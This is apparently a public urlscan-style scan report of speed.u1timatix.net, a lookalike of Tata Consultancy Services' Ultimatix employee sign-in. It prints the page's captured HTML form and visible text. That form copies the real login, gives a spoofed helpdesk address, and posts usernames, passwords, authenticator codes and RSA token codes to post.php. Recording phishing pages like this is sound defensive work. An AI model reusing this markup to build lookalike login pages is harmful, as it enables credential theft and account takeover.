speed.u1timatix.net Open in urlscan Pro
35.168.107.82  Public Scan

URL: https://speed.u1timatix.net/?rid=SUUClek9k1R
Submission: On March 22 via manual from US — Scanned from DE

Form analysis 1 forms found in the DOM

Name: loginFormPOST post.php

<form id="auth-code-outer" name="loginForm" method="post" action="post.php" onsubmit="return authValidation()" autocomplete="off">
  <div id="auth-code-inner1" style="display: none;">
    <div id="auth-code-inner">
      <div style="font-size: 13px" id="enter-auth"> Enter <strong>AuthCode</strong>
      </div>
      <div>
        <div id="complete_authcode">
          <input id="authcode1" class="auth-code-class" tabindex="1" type="number" name="Password" autocomplete="new-password" onkeyup="onKeyUpEvent(1, event)" onfocus="onFocusEvent(1)" onfocusout="onFocusOutEvent(1)" oninput="maxLengthCheck(this)"
            onkeydown="onKeyDownEvent(1,event)" maxlength="6" aria-label="Enter 6 digit authcode. Press tab to select other login method.">
        </div>
      </div>
      <div id="auth-error"></div>
      <!--AuthCode Modal -->
      <div class="modal fade" id="exampleModalCenter" tabindex="-1" role="dialog" aria-labelledby="exampleModalCenterTitle" aria-hidden="true">
        <div class="modal-dialog modal-dialog-centered" role="document">
          <div class="modal-content">
            <div class="modal-header">
              <h5 class="modal-title" id="exampleModalLongTitle">Ultimatix Authenticator </h5>
            </div>
            <div class="modal-body" id="authCodeModal">
              <p>An AuthCode can be generated using Ultimatix Authenticator app.</p>
              <p> Download the Ultimatix Authenticator app from <a href="#">
																							UxApps
																						</a>
              </p>
              <p id="helpdesk">For any help please contact U1timatix.helpdesk@tsc.com </p>
              <div class="modal-ok-btn-container">
                <button type="button" class="btn btn-primary waves-effect waves-light" data-dismiss="modal">OK</button>
              </div>
            </div>
          </div>
        </div>
      </div>
      <div id="other-login-methods-auth" tabindex="-1">
        <a onclick="window.location.reload();" id="otherloginoption" tabindex="0" onkeyup="enterOtherLogin(event)" style="text-align: center;">Other Login Methods</a>
      </div>
      <p id="otp-caution"></p>
      <input type="HIDDEN" name="SMENC" value="UTF-8">
      <input type="HIDDEN" name="SMLOCALE" value="US-EN">
      <input type="hidden" name="target" value="#">
      <input type="HIDDEN" id="username" name="USER" maxlength="256" tabindex="1">
      <input type="text" name="AuthType" value="1" hidden="" id="AuthType">
    </div>
  </div>
  <div id="password-outer" style="display: none;">
    <div id="password-inner" class="md-form">
      <div style="font-size: 13px" id="enter-password"> Enter <b>Password</b>
      </div>
      <div id="password-page-input">
        <div id="password-input-div">
          <input type="password" id="password-login" aria-label="Enter Password or, press tab to select other login methods" onkeyup="enabledPassBtn()" class="form-control" name="Password" autocomplete="chrome-off" disabled=""
            onclick="passwordColor()" onkeypress="capLockPass(event)" onfocusout="passwordFocusOut()">
        </div>
      </div>
      <div id="other-login-methods-pass">
        <a onclick="window.location.reload();" style="text-align: center;" tabindex="0" onkeyup="enterOtherLogin(event)">Other Login Methods</a>
      </div>
    </div>
  </div>
  <!--RSA-->
  <div id="rsa-outer" hidden="">
    <div id="rsa-inner" class="md-form">
      <div style="font-size: 13px" id="enter-passwordRSA" hidden=""> Enter <b>Password</b>
      </div>
      <div id="password-page-inputRSA" hidden="">
        <div id="password-input-divRSA">
          <input type="password" id="password-loginRSA" tabindex="0" aria-label="Enter Password or, press tab to select other login methods" onkeyup="enabledRSABtn()" class="form-control" name="Password" autocomplete="chrome-off" disabled=""
            onclick="passwordColor()" onkeypress="capLockPass(event)" onfocusout="passwordFocusOut()">
        </div>
      </div>
      <div id="pass-errorRSA"></div>
      <div style="font-size: 13px" id="enter-rsa"> Enter <b>TokenCode</b>
      </div>
      <div id="complete_rsa">
        <input id="rsa1" class="rsa-class" tabindex="0" type="number" autocomplete="chrome-off" onkeyup="onKeyUpEventRSA(1, event)" onfocus="onFocusEventRSA(1)" onfocusout="onFocusOutEventRSA(1)" oninput="maxLengthCheck(this)"
          onkeydown="onKeyDownEventRSA(event)" maxlength="8" aria-label="Enter 6 or 8 digit RSA Token. Press tab to select other login method." style="border-bottom-color: black;">
      </div>
      <input type="text" id="partitionedRSA" name="TokenCode" maxlength="8" autocomplete="chrome-off" hidden="">
      <div id="rsa-error" style="color: rgb(49, 49, 49);"> Use Token Code generated on <a data-toggle="modal" id="authApp" href="#rsa-info-modal" style="font-size: 13px; text-decoration: none;" tabindex="-1">Software/Hardware token
																		</a>
      </div>
      <!--RSA info modal-->
      <div class="modal fade" id="rsa-info-modal" tabindex="-1" role="dialog" aria-labelledby="rsa-info-title" aria-hidden="true">
        <div class="modal-dialog modal-dialog-centered" role="document">
          <div class="modal-content">
            <div class="modal-header">
              <h5 class="modal-title" id="rsa-info-title">Token Code</h5>
            </div>
            <div class="modal-body" id="rsa-info-body">
              <p> A TokenCode can be generated using <strong> Hard/Soft Token. Hard TokenCode is the Code displayed on the Hard Token physical device, whereas Soft TokenCode can be generated by entering the PIN on the Soft Token application. <br>For
                  any help please contact U1timatix.helpdesk@tsc.com </strong></p><strong>
                <div class="modal-ok-btn-container">
                  <button type="button" class="btn btn-primary waves-effect waves-light" data-dismiss="modal" id="modal-ok-btn-rsa">OK</button>
                </div>
              </strong>
            </div><strong>
            </strong>
          </div><strong>
          </strong>
        </div><strong>
        </strong>
      </div><strong>
        <div id="other-login-methods-rsa" tabindex="-1">
          <a onclick="otherLoginMethods()" style="text-align: center;" tabindex="0" onkeyup="enterOtherLogin(event)">Other Login Methods
							</a>
        </div>
      </strong>
    </div><strong>
    </strong>
  </div><strong>
    <!--Easy auth-->
    <div id="easyauth-outer" style="display: none;">
      <div id="easyauth-inner" class="md-form">
        <div id="enter-easyauth"> Login using<strong> EasyAuth</strong>
        </div>
        <div id="easyauth-page-subtitle" tabindex="0"> Tap the number shown below on the Authenticator app.<br> Please ensure your device is connected to the internet. </div>
        <div id="digit_container" tabindex="0" aria-label="Press tab for number">
          <div id="number">
            <img src="https://auth.ultimatix.net/login/img/Modified/easyAuthMobile.svg" id="easyAuthMobile">
            <div class="digits" tabindex="0" aria-live="assertive">60</div>
          </div>
          <div class="container timer">
            <div class="circle">
              <svg width="90" viewBox="0 0 220 220">
                <g transform="translate(110,110)">
                  <circle r="100" class="e-c-base" style="stroke: rgb(35, 78, 155);"></circle>
                  <g transform="rotate(-90)">
                    <circle r="100" class="e-c-progress" style="stroke-dasharray: 628.319; stroke-dashoffset: -1225.22;"></circle>
                    <g id="e-pointer" style="transform: rotate(342deg);">
                      <circle cx="100" cy="0" r="8" class="e-c-pointer" style="fill: rgb(35, 78, 155); stroke: rgb(35, 78, 155);"></circle>
                    </g>
                  </g>
                </g>
              </svg>
            </div>
            <div class="controlls">
              <div class="display-remain-time" tabindex="0" style="color: rgb(35, 78, 155);">57 seconds</div>
            </div>
          </div>
        </div>
        <div id="timeout" hidden="">
          <div id="ea_error"><img id="ERR" src="https://auth.ultimatix.net/login/img/Modified/easyauthErrors.svg" alt="Please check your Internet Connection or Try using Other Login Options"></div>
          <div id="timeout_msg" tabindex="0"></div>
          <button type="button" id="retry_opt" class="btn btn-primary waves-effect waves-light" onclick="easyAuth()">Retry</button>
        </div>
        <div id="easyauth-error"></div>
        <input type="password" id="easyAuth-login" name="Password" autocomplete="chrome-off" disabled="" hidden="">
        <div id="other-login-methods-easyauth">
          <a onclick="otherLoginMethods()" style="text-align: center;" tabindex="0" onkeyup="enterOtherLogin(event)">Other Login Methods
																		</a>
        </div>
      </div>
    </div>
    <!--easy auth ends-->
    <div id="submit-button" style="display: none;">
      <button type="submit" value="Submit" class="btn btn-primary waves-effect waves-light" id="form-submit" disabled="">Login</button>
      <div class="forget-link">
        <a href="#" tabindex="0">Need Help?&nbsp;</a><br>
      </div>
    </div>
    <!-- Proceed button -->
    <div id="static-button-container">
      <div id="button-container">
        <button type="button" class="btn btn-primary waves-effect waves-light" id="proceed-button" onclick="staticUsername()" tabindex="0" aria-label="Press enter key to Proceed or press tab if you need any help."> Proceed <span
            class="spinner-grow spinner-grow-sm"></span>
        </button>
      </div>
      <div class="forget-link">
        <a href="#" tabindex="0">Need Help?&nbsp;</a><br>
      </div>
    </div>
    <div id="ph_copyright">
      <a data-toggle="modal" data-target="#termsofUseModalMobile">Terms and Conditions</a>
      <br> Copyright © 2023 Tata Consultancy Services
    </div>
    <!-- Modal -->
    <div class="modal fade" id="termsofUseModalMobile" tabindex="-1" role="dialog" aria-labelledby="termsofUseModalTitle" aria-describedby="termsModal" aria-modal="true">
      <div class="modal-dialog modal-dialog-centered" role="document">
        <div class="modal-content" id="terms-content">
          <div class="modal-header">
            <h5 class="modal-title" id="termsofUseModalLongTitleMobile">
            </h5>
          </div>
          <div class="modal-body" id="termsModalMobile"></div>
          <div class="modal-ok-btn-container">
            <button type="button" class="btn btn-primary waves-effect waves-light" data-dismiss="modal">OK</button>
          </div>
        </div>
      </div>
    </div>
  </strong>
</form>

Text Content

You must enable Javascript in order to use this site.
Terms of Use | Browser and Display Compatibility
Copyright © 2023 Tata Consultancy Services
Entry to this site is restricted to employees and affiliates.
OK
OK
Username

Username


Select Login Method
Password
Use AuthCode generated using Ultimatix Authenticator app

ULTIMATIX AUTHENTICATOR

An AuthCode can be generated using Ultimatix Authenticator app.

Download the Ultimatix Authenticator app from UxApps

For any help please contact U1timatix.helpdesk@tsc.com

OK
Login
Need Help? 

Enter AuthCode



ULTIMATIX AUTHENTICATOR

An AuthCode can be generated using Ultimatix Authenticator app.

Download the Ultimatix Authenticator app from UxApps

For any help please contact U1timatix.helpdesk@tsc.com

OK
Other Login Methods



Enter Password

Other Login Methods
Enter Password


Enter TokenCode

Use Token Code generated on Software/Hardware token

TOKEN CODE

A TokenCode can be generated using Hard/Soft Token. Hard TokenCode is the Code
displayed on the Hard Token physical device, whereas Soft TokenCode can be
generated by entering the PIN on the Soft Token application.
For any help please contact U1timatix.helpdesk@tsc.com

OK
Other Login Methods
Login using EasyAuth
Tap the number shown below on the Authenticator app.
Please ensure your device is connected to the internet.
60
57 seconds

Retry

Other Login Methods
Login
Need Help? 

Proceed
Need Help? 

Terms and Conditions
Copyright © 2023 Tata Consultancy Services
OK